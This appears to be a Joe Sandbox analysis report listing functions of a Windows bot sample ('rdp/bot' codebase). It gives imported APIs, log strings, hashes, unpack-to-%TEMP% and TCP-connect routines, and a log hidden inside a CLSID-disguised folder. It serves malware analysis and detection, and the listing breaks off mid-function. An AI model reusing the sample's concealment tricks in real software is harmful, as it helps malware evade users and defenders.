Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-906809513
Opcode ID: b9a3b54f26be01f7b6bfa2c8b55ba6896c38e4924eb50a070b0cda7e7dea3bad
Instruction ID: d398d32bb69e3b895d62c269aa6720503ebed9e1105f8ff3a227bfc9e9a0d080
Opcode Fuzzy Hash: b9a3b54f26be01f7b6bfa2c8b55ba6896c38e4924eb50a070b0cda7e7dea3bad
Instruction Fuzzy Hash: 4571AF62B2CE4381FB214B97E8887BD1249BF44768F5901BAD90F476B5EE7CE8458701

Function 00007FFE0EBD42BE Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0EBD42DD
CreateDirectoryA.KERNEL32 ref: 00007FFE0EBD42FF
GetLastError.KERNEL32 ref: 00007FFE0EBD4350
strcpy.MSVCRT ref: 00007FFE0EBD43A1
strlen.MSVCRT ref: 00007FFE0EBD43A9
strlen.MSVCRT ref: 00007FFE0EBD43C5
strlen.MSVCRT ref: 00007FFE0EBD43D6
CreateDirectoryA.KERNEL32 ref: 00007FFE0EBD4447
GetLastError.KERNEL32 ref: 00007FFE0EBD4451

Strings

fs_dir_create, xrefs: 00007FFE0EBD432E, 00007FFE0EBD4362, 00007FFE0EBD43F9, 00007FFE0EBD451F, 00007FFE0EBD4586
NULL, xrefs: 00007FFE0EBD4577
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE0EBD4526
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE0EBD4369
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE0EBD4400
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE0EBD4320
(path != NULL), xrefs: 00007FFE0EBD4327
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE0EBD458D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EBD4335

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-906809513
Opcode ID: 79b62836e56daeaee3d79f430ae09f58abf3677d551c19074f938b73c9acbfd6
Instruction ID: ff3d99c90e491bd565820330cc308f942ed908fc176f1e3385dc5dd42f54641d
Opcode Fuzzy Hash: 79b62836e56daeaee3d79f430ae09f58abf3677d551c19074f938b73c9acbfd6
Instruction Fuzzy Hash: B9716B61E0D68386FB319F18E8407F92291AF48758F150132D9EE477B9EE3CE9858F01

Function 00007FF6BFD69B8C Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6BFD69BAC
GetLastError.KERNEL32 ref: 00007FF6BFD69CDD

Part of subcall function 00007FF6BFD61360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6BFD684AF), ref: 00007FF6BFD6137E

strlen.MSVCRT ref: 00007FF6BFD69BFE
strlen.MSVCRT ref: 00007FF6BFD69C1A
_mbscat.MSVCRT ref: 00007FF6BFD69C35
strlen.MSVCRT ref: 00007FF6BFD69C3D
strlen.MSVCRT ref: 00007FF6BFD69C52
fopen.MSVCRT ref: 00007FF6BFD69C75

Strings

Done, xrefs: 00007FF6BFD69E1A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF6BFD69BDE, 00007FF6BFD69BF4, 00007FF6BFD69C2B, 00007FF6BFD69C48, 00007FF6BFD69C94
debug_init, xrefs: 00007FF6BFD69C9B, 00007FF6BFD69CC0, 00007FF6BFD69CE8, 00007FF6BFD69DAD, 00007FF6BFD69E21
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF6BFD69CEF
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF6BFD69DB4
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF6BFD69CC7
main.log, xrefs: 00007FF6BFD69C5A
[I] (%s) -> %s, xrefs: 00007FF6BFD69E28
service, xrefs: 00007FF6BFD69B8E
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF6BFD69CA2

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
API String ID: 3216678114-1460613360
Opcode ID: 6f494a988963525dfc8c9e6694f7ed676b47cce2b4ff5cefa6908507d4734c9b
Instruction ID: d57b32e82fb8dca6c47ca3ddaf074084dd8de27df0e18e8ca890d19e5b1960a8
Opcode Fuzzy Hash: 6f494a988963525dfc8c9e6694f7ed676b47cce2b4ff5cefa6908507d4734c9b
Instruction Fuzzy Hash: 01510B50E0C603A1FA2197DDE9813B83391AF15754F554332EB0DCB2B6EE6DA95AC3C2

Function 00007FF6BFD679C0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 193stringCOMMON

Download Yara Rule

APIs

_mbscat.MSVCRT ref: 00007FF6BFD67B40
strlen.MSVCRT ref: 00007FF6BFD67BFE
_mbscpy.MSVCRT ref: 00007FF6BFD67C26
_mbscpy.MSVCRT ref: 00007FF6BFD67C7D
strlen.MSVCRT ref: 00007FF6BFD67C85
strlen.MSVCRT ref: 00007FF6BFD67CAF

Part of subcall function 00007FF6BFD62515: fopen.MSVCRT ref: 00007FF6BFD6255A
Part of subcall function 00007FF6BFD62515: fseek.MSVCRT ref: 00007FF6BFD62579
Part of subcall function 00007FF6BFD62515: _errno.MSVCRT ref: 00007FF6BFD6258D
Part of subcall function 00007FF6BFD62515: _errno.MSVCRT ref: 00007FF6BFD625A8

Strings

[I] (%s) -> Done(package=%s,target=%s), xrefs: 00007FF6BFD67CFD
[E] (%s) -> Failed(package=%s,target=%s,err=%08x), xrefs: 00007FF6BFD67A40
%TEMP%, xrefs: 00007FF6BFD67B22
NULL, xrefs: 00007FF6BFD67D0E, 00007FF6BFD67D1A
(package != NULL), xrefs: 00007FF6BFD67A71
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD67A7F, 00007FF6BFD67AAF
(target != NULL), xrefs: 00007FF6BFD67AA1
package_unpack, xrefs: 00007FF6BFD67A39, 00007FF6BFD67A78, 00007FF6BFD67AA8, 00007FF6BFD67B89, 00007FF6BFD67CD0, 00007FF6BFD67CF6
[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u), xrefs: 00007FF6BFD67CD7
[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x), xrefs: 00007FF6BFD67B90
H:/Projects/rdp/bot/codebase/package.c, xrefs: 00007FF6BFD67A6A, 00007FF6BFD67A9A

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
String ID: %TEMP%$(package != NULL)$(target != NULL)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
API String ID: 3066828623-625159688
Opcode ID: 105523515e84c8d438c400628abfd7f6ba265d1413e23efcc273f54c6047ae63
Instruction ID: 7a1e07686a3af298e1c7839be3bc74e5f2c292201f8115106352a8d4782161bf
Opcode Fuzzy Hash: 105523515e84c8d438c400628abfd7f6ba265d1413e23efcc273f54c6047ae63
Instruction Fuzzy Hash: 6B813161B08647A5EB109B9DE8403A97761FB44788F844236FB4DCB6A9EE7CE509C780

Function 00007FF6BFD63D81 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 199fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD63DD9
LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD63E12
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD63EE7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD63FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD64140

Strings

(lock != NULL), xrefs: 00007FF6BFD63EC3
fs_file_lock, xrefs: 00007FF6BFD63E66, 00007FF6BFD63E9A, 00007FF6BFD63ECA, 00007FF6BFD63EF5, 00007FF6BFD63FDA, 00007FF6BFD6415D
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF6BFD63EFC
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF6BFD64164
NULL, xrefs: 00007FF6BFD6414B
service, xrefs: 00007FF6BFD63D84
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD63EA1, 00007FF6BFD63ED1
(path != NULL), xrefs: 00007FF6BFD63E93
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD63E6D
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6BFD63E8C, 00007FF6BFD63EBC
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF6BFD63FE1

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
API String ID: 2747014929-3958755462
Opcode ID: 54ee31f5105c176933aa956faabb0ff0d66d276a4c84ab9d9d605d99f51c3a37
Instruction ID: 4e41f37da46a08cd82b98af45d558b09965602a9300557c38a44163a53d9f3ab
Opcode Fuzzy Hash: 54ee31f5105c176933aa956faabb0ff0d66d276a4c84ab9d9d605d99f51c3a37
Instruction Fuzzy Hash: 44813120A0C74BA1F730AB9CA54437873505F11758F141332FB6E8A7F6EE2EA995D392

Function 00007FFE11501C3C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11501C60
htonl.WS2_32 ref: 00007FFE11501CFC
htons.WS2_32 ref: 00007FFE11501D0D
connect.WS2_32 ref: 00007FFE11501D26
WSAGetLastError.WS2_32 ref: 00007FFE11501D4C
select.WS2_32 ref: 00007FFE11501DBC
WSAGetLastError.WS2_32 ref: 00007FFE11501DCC
WSAGetLastError.WS2_32 ref: 00007FFE11501E0E

Part of subcall function 00007FFE115018D9: ioctlsocket.WS2_32 ref: 00007FFE115018FF

Part of subcall function 00007FFE11501824: setsockopt.WS2_32 ref: 00007FFE1150184C
Part of subcall function 00007FFE11501824: setsockopt.WS2_32 ref: 00007FFE11501878

WSAGetLastError.WS2_32 ref: 00007FFE11501E3B

Strings

[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE11501DFD
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11501E53
tcp_connect, xrefs: 00007FFE11501CBD, 00007FFE11501DD8, 00007FFE11501DF6, 00007FFE11501E23, 00007FFE11501E4C, 00007FFE11501E76
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE11501E7D
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11501E2A
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE11501CC4
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11501DDF

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: b1219be86de29e58c55c1eaa20dbaf743f60072c4e4c0546304cb5b3e9e60796
Instruction ID: 67a8faef22bbe426dc50163e0a0a4d727c890a300125e2eb43c5deb6c1c4be09
Opcode Fuzzy Hash: b1219be86de29e58c55c1eaa20dbaf743f60072c4e4c0546304cb5b3e9e60796
Instruction Fuzzy Hash: 9451F361A0CE4282E7205BA7E4802BD379ABF85774F5013B9E86E47AF5DF7CE5058702

Function 00007FFE0EB450EC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0EB45110
htonl.WS2_32 ref: 00007FFE0EB451AC
htons.WS2_32 ref: 00007FFE0EB451BD
connect.WS2_32 ref: 00007FFE0EB451D6
WSAGetLastError.WS2_32 ref: 00007FFE0EB451FC
select.WS2_32 ref: 00007FFE0EB4526C
WSAGetLastError.WS2_32 ref: 00007FFE0EB4527C
WSAGetLastError.WS2_32 ref: 00007FFE0EB452BE

Part of subcall function 00007FFE0EB44D89: ioctlsocket.WS2_32 ref: 00007FFE0EB44DAF

Part of subcall function 00007FFE0EB44CD4: setsockopt.WS2_32 ref: 00007FFE0EB44CFC
Part of subcall function 00007FFE0EB44CD4: setsockopt.WS2_32 ref: 00007FFE0EB44D28

WSAGetLastError.WS2_32 ref: 00007FFE0EB452EB

Strings

[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0EB452AD
tcp_connect, xrefs: 00007FFE0EB4516D, 00007FFE0EB45288, 00007FFE0EB452A6, 00007FFE0EB452D3, 00007FFE0EB452FC, 00007FFE0EB45326
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EB4528F
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EB452DA
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0EB45174
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EB45303
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0EB4532D

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: b1d6f88f48f977056472bc5e2fc88cb5e718e3b35a49b9fbb396dfdf92b66e85
Instruction ID: 343caa97ffda4bfe0f4221d2e56de9c1578514f95bf3b53fc5566dca7af5dcf2
Opcode Fuzzy Hash: b1d6f88f48f977056472bc5e2fc88cb5e718e3b35a49b9fbb396dfdf92b66e85
Instruction Fuzzy Hash: 2E51C2A2A0DB4642EA349F59E8003B97761EF84764F041336E8EE466F5DE7CE5458F00

Function 00007FFE0EBD256C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0EBD2590
htonl.WS2_32 ref: 00007FFE0EBD262C
htons.WS2_32 ref: 00007FFE0EBD263D
connect.WS2_32 ref: 00007FFE0EBD2656
WSAGetLastError.WS2_32 ref: 00007FFE0EBD267C
select.WS2_32 ref: 00007FFE0EBD26EC
WSAGetLastError.WS2_32 ref: 00007FFE0EBD26FC
WSAGetLastError.WS2_32 ref: 00007FFE0EBD273E

Part of subcall function 00007FFE0EBD2209: ioctlsocket.WS2_32 ref: 00007FFE0EBD222F

Part of subcall function 00007FFE0EBD2154: setsockopt.WS2_32 ref: 00007FFE0EBD217C
Part of subcall function 00007FFE0EBD2154: setsockopt.WS2_32 ref: 00007FFE0EBD21A8

WSAGetLastError.WS2_32 ref: 00007FFE0EBD276B

Strings

[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0EBD25F4
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EBD275A
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0EBD272D
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0EBD27AD
tcp_connect, xrefs: 00007FFE0EBD25ED, 00007FFE0EBD2708, 00007FFE0EBD2726, 00007FFE0EBD2753, 00007FFE0EBD277C, 00007FFE0EBD27A6
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EBD270F
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EBD2783

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: ae9739fa974ddfb92da4c03f28b81f0a1c66518a12a67d205bf7b9f66d2fe415
Instruction ID: f8cc9acb3577812eeb872c70c26716e181077633560a2ac78452bc2b3382658b
Opcode Fuzzy Hash: ae9739fa974ddfb92da4c03f28b81f0a1c66518a12a67d205bf7b9f66d2fe415
Instruction Fuzzy Hash: CD51B121B0C68282E6309F29E8006F976A1AF85764F141335E9EE877F9FE7DE5458F00

Function 00007FFE0EC026AC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0EC026D0
htonl.WS2_32 ref: 00007FFE0EC0276C
htons.WS2_32 ref: 00007FFE0EC0277D
connect.WS2_32 ref: 00007FFE0EC02796
WSAGetLastError.WS2_32 ref: 00007FFE0EC027BC
select.WS2_32 ref: 00007FFE0EC0282C
WSAGetLastError.WS2_32 ref: 00007FFE0EC0283C
WSAGetLastError.WS2_32 ref: 00007FFE0EC0287E

Part of subcall function 00007FFE0EC02349: ioctlsocket.WS2_32 ref: 00007FFE0EC0236F

Part of subcall function 00007FFE0EC02294: setsockopt.WS2_32 ref: 00007FFE0EC022BC
Part of subcall function 00007FFE0EC02294: setsockopt.WS2_32 ref: 00007FFE0EC022E8

WSAGetLastError.WS2_32 ref: 00007FFE0EC028AB

Strings

[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0EC0286D
tcp_connect, xrefs: 00007FFE0EC0272D, 00007FFE0EC02848, 00007FFE0EC02866, 00007FFE0EC02893, 00007FFE0EC028BC, 00007FFE0EC028E6
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EC0289A
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0EC028ED
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EC028C3
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EC0284F
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0EC02734

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 94de46d72c65ae857ef5def21900205f0e79c633917917b5e84958e88d4ca194
Instruction ID: b9f556874499c8c9719a35dcf5a02849681203973357871b0034e7828cca4008
Opcode Fuzzy Hash: 94de46d72c65ae857ef5def21900205f0e79c633917917b5e84958e88d4ca194
Instruction Fuzzy Hash: 2451F625A0C7C2A1FA289B98E8842BA6651EF86770F140335DCED476F6DF7EE5058702

Function 00007FFE0E16256C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0E162590
htonl.WS2_32 ref: 00007FFE0E16262C
htons.WS2_32 ref: 00007FFE0E16263D
connect.WS2_32 ref: 00007FFE0E162656
WSAGetLastError.WS2_32 ref: 00007FFE0E16267C
select.WS2_32 ref: 00007FFE0E1626EC
